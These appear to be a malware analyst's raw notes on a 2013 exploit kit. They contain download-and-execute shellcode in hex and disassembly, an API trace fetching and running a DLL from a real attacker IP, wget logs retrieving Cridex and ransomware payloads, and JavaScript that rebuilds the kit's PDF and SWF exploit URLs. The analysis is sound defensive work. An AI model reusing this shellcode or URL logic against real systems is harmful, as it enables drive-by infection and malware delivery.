- 00000152 28427E sub [edx+0x7e],al ; math
- 00000155 D7 xlatb
- 00000156 AD lodsd
- 00000157 3C5D cmp al,0x5d
- 00000159 E8423E7B28 call dword 0x287b3fa0 ; call
- 0000015E 7ED7 jng 0x137
- 00000160 42 inc edx
- 00000161 2CAB sub al,0xab ; math
- 00000163 2824C3 sub [ebx+eax*8],ah ; math
- 00000166 D7 xlatb
- 00000167 7B2C jpo 0x195
- 00000169 7EEB jng 0x156
- 0000016B AB stosd
- 0000016C C3 ret
- 0000016D 24C3 and al,0xc3
- 0000016F 2A6F3B sub ch,[edi+0x3b] ; math
- 00000172 17 pop ss
- 00000173 A85D test al,0x5d
- 00000175 286FD2 sub [edi-0x2e],ch ; math
- 00000178 17 pop ss
- 00000179 A85D test al,0x5d
- 0000017B 2842EC sub [edx-0x14],al ; math
- 0000017E 42 inc edx
- 0000017F 28D7 sub bh,dl ; math
- 00000181 D6 salc
- 00000182 207EB4 and [esi-0x4c],bh
- 00000185 C0D7D6 rcl bh,0xd6
- 00000188 A6 cmpsb
- 00000189 D7 xlatb
- 0000018A 2666B0C4 es o16 mov al,0xc4
- 0000018E A2D6A12629 mov [0x2926a1d6],al
- 00000193 47 inc edi
- 00000194 1B95A2E23373 sbb edx,[ebp+0x7333e2a2]
- 0000019A 6E outsb
- 0000019B EE out dx,al
- 0000019C 1E push ds
- 0000019D 51 push ecx
- 0000019E 07 pop es
- 0000019F 324058 xor al,[eax+0x58] ; decryption
- 000001A2 5C pop esp
- 000001A3 5C pop esp
- 000001A4 125807 adc bl,[eax+0x7]
- 000001A7 07 pop es
- 000001A8 1E push ds
- 000001A9 1C19 sbb al,0x19
- 000001AB 06 push es
- 000001AC 1D1F1A061C sbb eax,0x1c061a1f
- 000001B1 1A1A sbb bl,[edx]
- 000001B3 06 push es
- 000001B4 1219 adc bl,[ecx]
- 000001B6 1810 sbb [eax],dl
- 000001B8 1810 sbb [eax],dl
- 000001BA 4E dec esi
- 000001BB 07 pop es
- 000001BC 5A pop edx
- 000001BD 47 inc edi
- 000001BE 45 inc ebp
- 000001BF 5D pop ebp
- 000001C0 44 inc esp
- 000001C1 07 pop es
- 000001C2 46 inc esi
- 000001C3 41 inc ecx
- 000001C4 5B pop ebx
- 000001C5 43 inc ebx
- 000001C6 58 pop eax
- 000001C7 07 pop es
- 000001C8 4A dec edx
- 000001C9 5D pop ebp
- 000001CA 41 inc ecx
- 000001CB 44 inc esp
- 000001CC 774B ja 0x219
- 000001CE 4D dec ebp
- 000001CF 5E pop esi
- 000001D0 5B pop ebx
- 000001D1 5A pop edx
- 000001D2 47 inc edi
- 000001D3 41 inc ecx
- 000001D4 06 push es
- 000001D5 46 inc esi
- 000001D6 40 inc eax
- 000001D7 58 pop eax
- 000001D8 17 pop ss
- 000001D9 58 pop eax
- 000001DA 4E dec esi
- 000001DB 5C pop esp
- 000001DC 1B1512184619 sbb edx,[dword 0x19461812]
- 000001E2 1912 sbb [edx],edx
- 000001E4 124141 adc al,[ecx+0x41]
- 000001E7 191B sbb [ebx],ebx
- 000001E9 120E adc cl,[esi]
- 000001EB 1B4D5F sbb ecx,[ebp+0x5f]
- 000001EE 1A15125E4319 sbb dl,[dword 0x19435e12]
- 000001F4 1912 sbb [edx],edx
- 000001F6 12451A adc al,[ebp+0x1a]
- 000001F9 1B1B sbb ebx,[ebx]
- 000001FB 1212 adc dl,[edx]
- 000001FD 1B4319 sbb eax,[ebx+0x19]
- 00000200 1912 sbb [edx],edx
- 00000202 124319 adc al,[ebx+0x19]
- 00000205 1B19 sbb ebx,[ecx]
- 00000207 1212 adc dl,[edx]
- 00000209 42 inc edx
- 0000020A 47 inc edi
- 0000020B 19590E sbb [ecx+0xe],ebx
- 0000020E 19150E434045 sbb [dword 0x4540430e],edx
- 00000214 58 pop eax
- 00000215 155E0E155E adc eax,0x5e150e5e
- 0000021A 285A00 sub [edx+0x0],bl ; math
- 0000021D 28 db 0x28
- // gathered blocks of API..
- blocks.. translation..
- 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
- 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
- 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
- 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
- 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
- // same one.... different code.. in url parts.. two time...
- // raws..
- 414141418366fce4ebfc5810c931816603e980fe2830e240ebfae805ffebffffccad1c5d77c1e81ba34c186868a3a3243458a37e205ef31ba34e14765c2b041bc6a9383dd7d7a39018686eeb2e11d35d1cafad0c5dccc17964c37e795da3a3141d5c2b507edd5ea32b081bdd61e1d4692b851bed27f33896da10205ce3e92b2568f2d9c33713ce5da3760c76f52ba34e63246ea5d7c40c7ca3242bf0a3f5a32ced2b7683eb717bc3a385084055a81b242b5cc3bea3db2040dfa32d42c071d7b0d7d7d1ca28c0282870284278406828d72828ab7831e87d78c4a376a3ab382debcbd74740284640285a5d4544d77cab3e20ecc0a349c0d7d7c3d7c32aa95a2cc42829a5280c74ef240c2c4d5a5b4f6cef2c0c5a5e1a1b6cef200c0508085b407b28d028287ed7a3241bc079e16cef2835585f5c4a6cef2d354c0644446cee21357128e9a2182c6ca02c357969284228427f7b28427ed7ad3c5de8423e7b287ed7422cab2824c3d77b2c7eebabc324c32a6f3b17a85d286fd217a85d2842ec4228d7d6207eb4c0d7d6a6d72666b0c4a2d6a12629471b95a2e233736eee1e51073240585c5c125807071e1c19061d1f1a061c1a1a061219181018104e075a47455d440746415b4358074a5d4144774b4d5e5b5a47410646405817584e5c1b15121846191912124141191b120e1b4d5f1a15125e4319191212451a1b1b12121b431919121243191b191212424719590e19150e43404558155e0e155e285a0028
- // view...
- 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
- e9 03 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
- ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
- 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
- a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
- af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
- 5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
- 85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
- f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
- 24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
- 2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
- 5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
- d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
- 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
- d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
- ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
- 29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
- 0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
- d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
- 5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
- 28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
- 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
- 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
- 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
- d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
- 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
- 58 40 5c 5c 58 12 07 07 1c 1e 06 19 1f 1d 06 1a X@\\X...........
- 1a 1c 06 1a 19 12 10 18 10 18 07 4e 47 5a 5d 45 ...........NGZ]E
- 07 44 41 46 43 5b 07 58 5d 4a 44 41 4b 77 5e 4d .DAFC[.X]JDAKw^M
- 5a 5b 41 47 46 06 58 40 58 17 46 4e 15 19 40 12 Z[AGF.X@X.FN..@.
- 19 42 12 19 42 12 1b 1a 12 19 4e 0e 42 4d 15 19 .B..B.....N.BM..
- 42 12 1b 1b 12 1b 1a 12 19 44 12 19 4f 12 19 41 B........D..O..A
- 12 19 47 12 19 46 12 19 47 12 19 41 0e 5c 15 19 ..G..F..G..A.\..
- 43 0e 47 51 15 58 0e 42 40 15 41 28 28 00 C.GQ.X.B@.A((.
- //disasm...
- 00000000 41 inc ecx
- 00000001 41 inc ecx
- 00000002 41 inc ecx
- 00000003 41 inc ecx
- 00000004 8366FCE4 and dword [esi-0x4],byte -0x1c
- 00000008 EBFC jmp short 0x6 ; loop
- 0000000A 58 pop eax
- 0000000B 10C9 adc cl,cl
- 0000000D 31816603E980 xor [ecx-0x7f16fc9a],eax ; decryption
- 00000013 FE db 0xfe
- 00000014 2830 sub [eax],dh ; math
- 00000016 E240 loop 0x58 ; loop
- 00000018 EBFA jmp short 0x14 ; loop
- 0000001A E805FFEBFF call dword 0xffebff24 ; call
- 0000001F FFCC dec esp
- 00000021 AD lodsd
- 00000022 1C5D sbb al,0x5d
- 00000024 77C1 ja 0xffffffe7
- 00000026 E81BA34C18 call dword 0x184ca346 ; call
- 0000002B 6868A3A324 push dword 0x24a3a368
- 00000030 3458 xor al,0x58 ; decryption
- 00000032 A37E205EF3 mov [0xf35e207e],eax
- 00000037 1BA34E14765C sbb esp,[ebx+0x5c76144e]
- 0000003D 2B041B sub eax,[ebx+ebx] ; math
- 00000040 C6 db 0xc6
- 00000041 A9383DD7D7 test eax,0xd7d73d38
- 00000046 A39018686E mov [0x6e681890],eax
- 0000004B EB2E jmp short 0x7b ; loop
- 0000004D 11D3 adc ebx,edx
- 0000004F 5D pop ebp
- 00000050 1CAF sbb al,0xaf
- 00000052 AD lodsd
- 00000053 0C5D or al,0x5d
- 00000055 CC int3
- 00000056 C17964C3 sar dword [ecx+0x64],0xc3
- 0000005A 7E79 jng 0xd5
- 0000005C 5D pop ebp
- 0000005D A3A3141D5C mov [0x5c1d14a3],eax
- 00000062 2B507E sub edx,[eax+0x7e] ; math
- 00000065 DD5EA3 fstp qword [esi-0x5d]
- 00000068 2B08 sub ecx,[eax] ; math
- 0000006A 1BDD sbb ebx,ebp
- 0000006C 61 popad
- 0000006D E1D4 loope 0x43
- 0000006F 692B851BED27 imul ebp,[ebx],dword 0x27ed1b85
- 00000075 F33896DA10205C rep cmp [esi+0x5c2010da],dl
- 0000007C E3E9 jecxz 0x67
- 0000007E 2B2568F2D9C3 sub esp,[dword 0xc3d9f268] ; math
- 00000084 37 aaa
- 00000085 13CE adc ecx,esi
- 00000087 5D pop ebp
- 00000088 A3760C76F5 mov [0xf5760c76],eax
- 0000008D 2BA34E63246E sub esp,[ebx+0x6e24634e] ; math
- 00000093 A5 movsd
- 00000094 D7 xlatb
- 00000095 C40C7C les ecx,[esp+edi*2]
- 00000098 A3242BF0A3 mov [0xa3f02b24],eax
- 0000009D F5 cmc
- 0000009E A32CED2B76 mov [0x762bed2c],eax
- 000000A3 83EB71 sub ebx,byte +0x71 ; math
- 000000A6 7BC3 jpo 0x6b
- 000000A8 A385084055 mov [0x55400885],eax
- 000000AD A81B test al,0x1b
- 000000AF 242B and al,0x2b
- 000000B1 5C pop esp
- 000000B2 C3 ret
- 000000B3 BEA3DB2040 mov esi,0x4020dba3
- 000000B8 DFA32D42C071 fbld tword [ebx+0x71c0422d]
- 000000BE D7 xlatb
- 000000BF B0D7 mov al,0xd7
- 000000C1 D7 xlatb
- 000000C2 D1CA ror edx,1 ; bitwise cipher
- 000000C4 28C0 sub al,al ; math
- 000000C6 2828 sub [eax],ch ; math
- 000000C8 7028 jo 0xf2
- 000000CA 42 inc edx
- 000000CB 7840 js 0x10d
- 000000CD 6828D72828 push dword 0x2828d728
- 000000D2 AB stosd
- 000000D3 7831 js 0x106
- 000000D5 E87D78C4A3 call dword 0xa3c47957 ; call
- 000000DA 76A3 jna 0x7f
- 000000DC AB stosd
- 000000DD 382DEBCBD747 cmp [dword 0x47d7cbeb],ch
- 000000E3 40 inc eax
- 000000E4 284640 sub [esi+0x40],al ; math
- 000000E7 285A5D sub [edx+0x5d],bl ; math
- 000000EA 45 inc ebp
- 000000EB 44 inc esp
- 000000EC D7 xlatb
- 000000ED 7CAB jl 0x9a
- 000000EF 3E20EC ds and ah,ch
- 000000F2 C0A349C0D7D7C3 shl byte [ebx-0x28283fb7],0xc3
- 000000F9 D7 xlatb
- 000000FA C3 ret
- 000000FB 2AA95A2CC428 sub ch,[ecx+0x28c42c5a] ; math
- 00000101 29A5280C74EF sub [ebp-0x108bf3d8],esp ; math
- 00000107 240C and al,0xc
- 00000109 2C4D sub al,0x4d ; math
- 0000010B 5A pop edx
- 0000010C 5B pop ebx
- 0000010D 4F dec edi
- 0000010E 6C insb
- 0000010F EF out dx,eax
- 00000110 2C0C sub al,0xc ; math
- 00000112 5A pop edx
- 00000113 5E pop esi
- 00000114 1A1B sbb bl,[ebx]
- 00000116 6C insb
- 00000117 EF out dx,eax
- 00000118 200C0508085B40 and [eax+0x405b0808],cl
- 0000011F 7B28 jpo 0x149
- 00000121 D028 shr byte [eax],1
- 00000123 287ED7 sub [esi-0x29],bh ; math
- 00000126 A3241BC079 mov [0x79c01b24],eax
- 0000012B E16C loope 0x199
- 0000012D EF out dx,eax
- 0000012E 2835585F5C4A sub [dword 0x4a5c5f58],dh ; math
- 00000134 6C insb
- 00000135 EF out dx,eax
- 00000136 2D354C0644 sub eax,0x44064c35 ; math
- 0000013B 44 inc esp
- 0000013C 6C insb
- 0000013D EE out dx,al
- 0000013E 21357128E9A2 and [dword 0xa2e92871],esi
- 00000144 182C6C sbb [esp+ebp*2],ch
- 00000147 A02C357969 mov al,[0x6979352c]
- 0000014C 284228 sub [edx+0x28],al ; math
- 0000014F 42 inc edx
- 00000150 7F7B jg 0x1cd
- 00000152 28427E sub [edx+0x7e],al ; math
- 00000155 D7 xlatb
- 00000156 AD lodsd
- 00000157 3C5D cmp al,0x5d
- 00000159 E8423E7B28 call dword 0x287b3fa0 ; call
- 0000015E 7ED7 jng 0x137
- 00000160 42 inc edx
- 00000161 2CAB sub al,0xab ; math
- 00000163 2824C3 sub [ebx+eax*8],ah ; math
- 00000166 D7 xlatb
- 00000167 7B2C jpo 0x195
- 00000169 7EEB jng 0x156
- 0000016B AB stosd
- 0000016C C3 ret
- 0000016D 24C3 and al,0xc3
- 0000016F 2A6F3B sub ch,[edi+0x3b] ; math
- 00000172 17 pop ss
- 00000173 A85D test al,0x5d
- 00000175 286FD2 sub [edi-0x2e],ch ; math
- 00000178 17 pop ss
- 00000179 A85D test al,0x5d
- 0000017B 2842EC sub [edx-0x14],al ; math
- 0000017E 42 inc edx
- 0000017F 28D7 sub bh,dl ; math
- 00000181 D6 salc
- 00000182 207EB4 and [esi-0x4c],bh
- 00000185 C0D7D6 rcl bh,0xd6
- 00000188 A6 cmpsb
- 00000189 D7 xlatb
- 0000018A 2666B0C4 es o16 mov al,0xc4
- 0000018E A2D6A12629 mov [0x2926a1d6],al
- 00000193 47 inc edi
- 00000194 1B95A2E23373 sbb edx,[ebp+0x7333e2a2]
- 0000019A 6E outsb
- 0000019B EE out dx,al
- 0000019C 1E push ds
- 0000019D 51 push ecx
- 0000019E 07 pop es
- 0000019F 324058 xor al,[eax+0x58] ; decryption
- 000001A2 5C pop esp
- 000001A3 5C pop esp
- 000001A4 125807 adc bl,[eax+0x7]
- 000001A7 07 pop es
- 000001A8 1E push ds
- 000001A9 1C19 sbb al,0x19
- 000001AB 06 push es
- 000001AC 1D1F1A061C sbb eax,0x1c061a1f
- 000001B1 1A1A sbb bl,[edx]
- 000001B3 06 push es
- 000001B4 1219 adc bl,[ecx]
- 000001B6 1810 sbb [eax],dl
- 000001B8 1810 sbb [eax],dl
- 000001BA 4E dec esi
- 000001BB 07 pop es
- 000001BC 5A pop edx
- 000001BD 47 inc edi
- 000001BE 45 inc ebp
- 000001BF 5D pop ebp
- 000001C0 44 inc esp
- 000001C1 07 pop es
- 000001C2 46 inc esi
- 000001C3 41 inc ecx
- 000001C4 5B pop ebx
- 000001C5 43 inc ebx
- 000001C6 58 pop eax
- 000001C7 07 pop es
- 000001C8 4A dec edx
- 000001C9 5D pop ebp
- 000001CA 41 inc ecx
- 000001CB 44 inc esp
- 000001CC 774B ja 0x219
- 000001CE 4D dec ebp
- 000001CF 5E pop esi
- 000001D0 5B pop ebx
- 000001D1 5A pop edx
- 000001D2 47 inc edi
- 000001D3 41 inc ecx
- 000001D4 06 push es
- 000001D5 46 inc esi
- 000001D6 40 inc eax
- 000001D7 58 pop eax
- 000001D8 17 pop ss
- 000001D9 58 pop eax
- 000001DA 4E dec esi
- 000001DB 5C pop esp
- 000001DC 1B1512184619 sbb edx,[dword 0x19461812]
- 000001E2 1912 sbb [edx],edx
- 000001E4 124141 adc al,[ecx+0x41]
- 000001E7 191B sbb [ebx],ebx
- 000001E9 120E adc cl,[esi]
- 000001EB 1B4D5F sbb ecx,[ebp+0x5f]
- 000001EE 1A15125E4319 sbb dl,[dword 0x19435e12]
- 000001F4 1912 sbb [edx],edx
- 000001F6 12451A adc al,[ebp+0x1a]
- 000001F9 1B1B sbb ebx,[ebx]
- 000001FB 1212 adc dl,[edx]
- 000001FD 1B4319 sbb eax,[ebx+0x19]
- 00000200 1912 sbb [edx],edx
- 00000202 124319 adc al,[ebx+0x19]
- 00000205 1B19 sbb ebx,[ecx]
- 00000207 1212 adc dl,[edx]
- 00000209 42 inc edx
- 0000020A 47 inc edi
- 0000020B 19590E sbb [ecx+0xe],ebx
- 0000020E 19150E434045 sbb [dword 0x4540430e],edx
- 00000214 58 pop eax
- 00000215 155E0E155E adc eax,0x5e150e5e
- 0000021A 285A00 sub [edx+0x0],bl ; math
- 0000021D 28 db 0x28
- //translating API..
- blocks.... translation...
- 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
- 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
- 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
- 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
- 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
- //============================
- // PAYLOADS GOES FIRST...
- //============================
- // fetch these sh*ts...
- --2013-02-18 15:08:46-- h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r
- seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
- :
- GET /forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r http/1.0
- Host: 46.175.224.21:8080
- http request sent, awaiting response...
- :
- http/1.1 200 OK
- Server: nginx/1.0.10
- Date: Mon, 18 Feb 2013 06:08:39 GMT
- Content-Type: application/x-msdownload
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Pragma: public
- Expires: Mon, 18 Feb 2013 06:08:39 GMT
- Cache-Control: must-revalidate, post-check=0, pre-check=0
- Cache-Control: private
- Content-Disposition: attachment; filename="about.exe"
- Content-Transfer-Encoding: binary
- Content-Length: 94208
- :
- 200 OK
- Length: 94208 (92K) [application/x-msdownload]
- Saving to: `./about.exe'
- 2013-02-18 15:08:48 (59.5 KB/s) - `./about.exe' saved [94208/94208]
- --2013-02-18 15:07:55-- h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
- seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
- :
- GET /forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i http/1.0
- Host: 46.175.224.21:8080
- http request sent, awaiting response...
- :
- h00p/1.1 200 OK
- Server: nginx/1.0.10
- Date: Mon, 18 Feb 2013 06:07:48 GMT
- Content-Type: application/x-msdownload
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Pragma: public
- Expires: Mon, 18 Feb 2013 06:07:48 GMT
- Cache-Control: must-revalidate, post-check=0, pre-check=0
- Cache-Control: private
- Content-Disposition: attachment; filename="readme.exe"
- Content-Transfer-Encoding: binary
- Content-Length: 279040
- :
- 200 OK
- Length: 279040 (273K) [application/x-msdownload]
- Saving to: `./readme.exe'
- 2013-02-18 15:08:00 (70.7 KB/s) - `./readme.exe' saved [279040/279040]
- //Payloads checks...Cridex & ransomware....
- https://www.virustotal.com/ja/file/bea956049c02eefa07495dda55a1624ba3fe4020ed268094f7b63ec53439d48d/analysis/1361171081/
- https://www.virustotal.com/ja/file/5050a5bdf164767ba6a8432a273942983737b3553c2f0d8fdbab42bbdaab3f6e/analysis/1361171101/
- =============CRACK LOGIC FOR PDF URL==================
- function x(s){
- d = [];
- for (i = 0; i < s.length; i ++ ){
- k = (s.charCodeAt(i)).toString(33);
- d.push(k);
- }
- ;
- return d.join(":");
- }
- var domain="h00p://46.175.224.21:8080";
- var pdf ="1k:1d:1f:1d:1g:1d:1f";
- var string1 ="/forum/links/public_version.php?tzpiqxci=" + x("244e0") + "&rqoddrzb=" + x("bpc") + "&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=";
- var string2 ="/forum/links/public_version.php?iitxovwc=" + x("244e0") + "&hic=" + x("c") + "&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=" ;
- var string3 ="/forum/links/public_version.php?hysb=" + x("c833f") + "&togkor=" + x("oyt") + "&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=";
- var string4 ="/forum/links/public_version.php?myedivup=" + x("c833f") + ">aaynbu=" + x("h") + "&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=";
- var url1 = domain + string1 + pdf;
- var url2 = domain + string2 + pdf;
- var url3 = domain + string3 + pdf;
- var url4 = domain + string4 + pdf;
- document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
- // output:
- h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
- h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
- h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
- h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33>aaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
- //=============CRACK LOGIC FOR SWF URL==================
- function x(s){
- d = [];
- for (i = 0; i < s.length; i ++ ){
- k = (s.charCodeAt(i)).toString(33);
- d.push(k);
- }
- ;
- return d.join(":");
- }
- var domain="h00p://46.175.224.21:8080";
- var url1 = domain + "/forum/links/public_version.php?jwio=" + x("244e0") + "&xnrj=" + x("nxjmw") + "&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg";
- var url2 = domain + "/forum/links/public_version.php?ecxrx=" + x("244e0") + "&pihpkcv=" + x("tlil") + "&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda";
- var url3 = domain + "/forum/links/public_version.php?jsehhtfz=" + x("c833f") + "&rrhjmwf=" + x("eomsp") + "&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms";
- var url4 = domain + "/forum/links/public_version.php?efoo=" + x("c833f") + "&bpsmrsqj=" + x("wdrh") + "&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx";
- document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
- // output
- h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
- h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
- h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
- h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
- //=============LET's FLUSH THEM (4 PDF + 4 SWF) ALL!!! =============
- //pdf
- --2013-02-18 15:50:22-- h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 20161 (20K) [application/pdf]
- Saving to: `./pdf1.pdf'
- 100%[==============================================================================>] 20,161 32.3K/s in 0.6s
- 2013-02-18 15:50:24 (32.3 KB/s) - `./pdf1.pdf' saved [20161/20161]
- --2013-02-18 15:50:53-- h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 11194 (11K) [application/pdf]
- Saving to: `./pdf2.pdf'
- 100%[==============================================================================>] 11,194 32.5K/s in 0.3s
- 2013-02-18 15:50:54 (32.5 KB/s) - `./pdf2.pdf' saved [11194/11194]
- --2013-02-18 15:51:22-- h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 20161 (20K) [application/pdf]
- Saving to: `./pdf3.pdf'
- 100%[==============================================================================>] 20,161 31.6K/s in 0.6s
- 2013-02-18 15:51:24 (31.6 KB/s) - `./pdf3.pdf' saved [20161/20161]
- --2013-02-18 15:52:02-- h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33>aaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
- Connecting to 46.175.224.21:8080... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 11160 (11K) [application/pdf]
- Saving to: `./pdf4.pdf'
